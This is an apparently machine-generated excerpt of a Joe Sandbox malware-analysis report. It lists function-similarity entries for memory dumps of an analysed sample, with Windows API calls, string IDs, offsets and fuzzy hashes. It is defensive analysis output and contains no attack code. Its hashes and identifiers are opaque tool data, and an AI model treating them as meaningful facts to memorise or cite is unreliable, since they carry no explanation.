                                                                                                                • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                                                                • Instruction ID: 7a259519bc08c6f0ac289ccbe8cc23391b6b7254e680c1ba314532043cd12642
                                                                                                                • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                                                                • Instruction Fuzzy Hash: 77F04FA5A1970691EF10AF34E444B3B7731AF88B61FD80335DAAD5A6E4CF2CD849C340
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                                                                                • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                                                                                • ExitProcess.KERNEL32 ref: 0000000140008545
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressExitHandleModuleProcProcess
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 75539706-1276376045
                                                                                                                • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                                                                • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                                                                                • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                                                                • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 1740715915-0
                                                                                                                • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                                                                • Instruction ID: 2a28e95cb6a7a6a9ee381350e7d0791bf42304456d6e64d1f1a1e726382e0cae
                                                                                                                • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                                                                • Instruction Fuzzy Hash: F9B1B2B1A0A64285EE65FF71D480A3A67A0EF54B84F9DC435DE4C2F785DE3CE8498B40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoSleepStartupType
                                                                                                                • String ID:
                                                                                                                • API String ID: 1527402494-0
                                                                                                                • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                                                                • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                                                                                • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                                                                • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 3078728599-0
                                                                                                                • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                                                                • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                                                                                • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                                                                • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1850339568-0
                                                                                                                • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                                                                • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                                                                                • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                                                                • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _set_statfp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1156100317-0
                                                                                                                • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                                                                • Instruction ID: 46cc5dcd53557b42516c928f39491b11e945224738e3ce02a790eab27aa36c01
                                                                                                                • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                                                                • Instruction Fuzzy Hash: B611B4B2D9864B21FE643D38D325B7B12005F9C370F9C4230E56E2E2DA9E2C5C484700
                                                                                                                APIs
                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096A3
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096C2
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096EA
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096FB
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC320970C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value
                                                                                                                • String ID:
                                                                                                                • API String ID: 3702945584-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value
                                                                                                                • String ID:
                                                                                                                • API String ID: 3702945584-0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                • String ID: MOC$RCC
                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                • String ID: csm$csm
                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                • String ID: MOC$RCC
                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLoadModuleProc
                                                                                                                • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                                • API String ID: 3055805555-3733552308
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentSizeWorking
                                                                                                                • String ID: Shrinking process size
                                                                                                                • API String ID: 2122760700-652428428
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$Leave
                                                                                                                • String ID:
                                                                                                                • API String ID: 2801635615-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                • String ID:
                                                                                                                • API String ID: 2718003287-0
                                                                                                                APIs
                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFBC320ED07), ref: 00007FFBC320EE38
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFBC320ED07), ref: 00007FFBC320EEC3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 953036326-0
                                                                                                                • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                                                • Instruction ID: bc0060bbca3f17f6f7ed8b7e9410476f719397b99e53a02845e36e2fa3eb9091
                                                                                                                • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                                                • Instruction Fuzzy Hash: A091C7B2F18A5185FF60AF75D440A7E6BA4AB04798F984135DE4E7A685DF38D48AC300
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                                                                                • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                                                                                • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEventSection$EnterLeaveReset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3553466030-0
                                                                                                                • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                                                • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                                                                                • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                                                • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEventSection$EnterLeaveReset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3553466030-0
                                                                                                                • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                                                • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                                                                                • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                                                • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2933794660-0
                                                                                                                • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                                                • Instruction ID: 300e9d97a577a314a47ad2e2211157d91ddeddf12184fe1fc4cbce8b89e43a02
                                                                                                                • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                                                • Instruction Fuzzy Hash: 35114C62B14B058AEF00DF70E8446B933B4F719758F881A31EA2D5A7A4DF38D558C340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateEvent$CriticalInitializeSection
                                                                                                                • String ID:
                                                                                                                • API String ID: 926662266-0
                                                                                                                • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                                                • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                                                                                • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                                                • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
